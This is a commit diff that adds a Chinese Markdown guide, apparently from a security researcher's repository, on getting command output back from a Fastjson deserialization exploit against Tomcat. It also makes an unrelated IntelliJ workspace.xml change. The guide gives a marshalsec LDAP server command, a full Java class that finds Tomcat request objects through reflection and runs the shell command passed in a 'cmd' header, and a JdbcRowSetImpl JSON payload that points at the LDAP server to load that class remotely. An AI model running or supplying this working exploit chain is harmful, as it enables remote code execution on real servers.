Fastjson回显.md

Author: SummerSec

Rce_Echo/TomcatEcho/Fastjson回显.md

@@ -0,0 +1,107 @@
+# Fastjson回显
+
+1. 先启动一个LDAP服务
+
+`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.
+0.0.1:6666#Cat`
+
+2. 再启动http服务
+
+`py -3 -m http.server --bind 127.0.0.1 6666`
+
+3. 再http服务下的目录创建一个`XXX.java`文件 然后`Javac XXX.java` 文件内容如下：
+
+    ```
+    public class Cat {
+        public Cat()throws Exception{
+            boolean flag = false;
+            ThreadGroup group = Thread.currentThread().getThreadGroup();
+            java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
+            f.setAccessible(true);
+            Thread[] threads = (Thread[]) f.get(group);
+            for(int i = 0; i < threads.length; i++) {
+                try{
+                    Thread t = threads[i];
+                    if (t == null) continue;
+                    String str = t.getName();
+                    if (str.contains("exec") || !str.contains("http")) continue;
+                    f = t.getClass().getDeclaredField("target");
+                    f.setAccessible(true);
+                    Object obj = f.get(t);
+                    if (!(obj instanceof Runnable)) continue;
+                    f = obj.getClass().getDeclaredField("this$0");
+                    f.setAccessible(true);
+                    obj = f.get(obj);
+                    try{
+                        f = obj.getClass().getDeclaredField("handler");
+                    }catch (NoSuchFieldException e){
+                        f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
+                    }
+                    f.setAccessible(true);
+                    obj = f.get(obj);
+                    try{
+                        f = obj.getClass().getSuperclass().getDeclaredField("global");
+                    }catch(NoSuchFieldException e){
+                        f = obj.getClass().getDeclaredField("global");
+                    }
+                    f.setAccessible(true);
+                    obj = f.get(obj);
+                    f = obj.getClass().getDeclaredField("processors");
+                    f.setAccessible(true);
+                    java.util.List processors = (java.util.List)(f.get(obj));
+                    for(int j = 0; j < processors.size(); ++j) {
+                        Object processor = processors.get(j);
+                        f = processor.getClass().getDeclaredField("req");
+                        f.setAccessible(true);
+                        Object req = f.get(processor);
+                        Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
+                        str = (String)req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
+                        if (str != null && !str.isEmpty()) {
+                            resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
+                            String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
+                            String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
+                            byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter("\\A").next().getBytes(charsetName);
+                            try {
+                                Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
+                                obj = cls.newInstance();
+                                cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
+                                resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+                            } catch (NoSuchMethodException var5) {
+                                Class cls = Class.forName("java.nio.ByteBuffer");
+                                obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
+                                resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
+                            }
+                            flag = true;
+                        }
+                        if (flag) break;
+                    }
+                    if (flag)  break;
+                }catch(Exception e){
+                    continue;
+                }
+            }
+        }
+    }
+    ```
+
+3. payload 直接发送
+
+```
+{
+    "a":{
+        "@type":"java.lang.Class",
+        "val":"com.sun.rowset.JdbcRowSetImpl"
+    },
+    "b":{
+        "@type":"com.sun.rowset.JdbcRowSetImpl",
+        "dataSourceName":"ldap://127.0.0.1:1389/Cat",
+        "autoCommit":"true"
+    }
+}
+```
+
+
+
+4. 直接回显
+
+![image-20210622174122630](https://gitee.com/samny/images/raw/master/summersec//22u41er22ec/22u41er22ec.png)

vuldemo/.idea/workspace.xml

@@ -1,5 +1,18 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+  <component name="FacetManager">
+    <facet type="web" name="Web">
+      <configuration>
+        <webroots>
+          <root url="file://$MODULE_DIR$/src/main/resources/webapp" relative="/" />
+        </webroots>
+        <sourceRoots>
+          <root url="file://$MODULE_DIR$/src/main/java" />
+          <root url="file://$MODULE_DIR$/src/main/resources" />
+        </sourceRoots>
+      </configuration>
+    </facet>
+  </component>
   <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_7">
     <output url="file://$MODULE_DIR$/target/classes" />
     <output-test url="file://$MODULE_DIR$/target/test-classes" />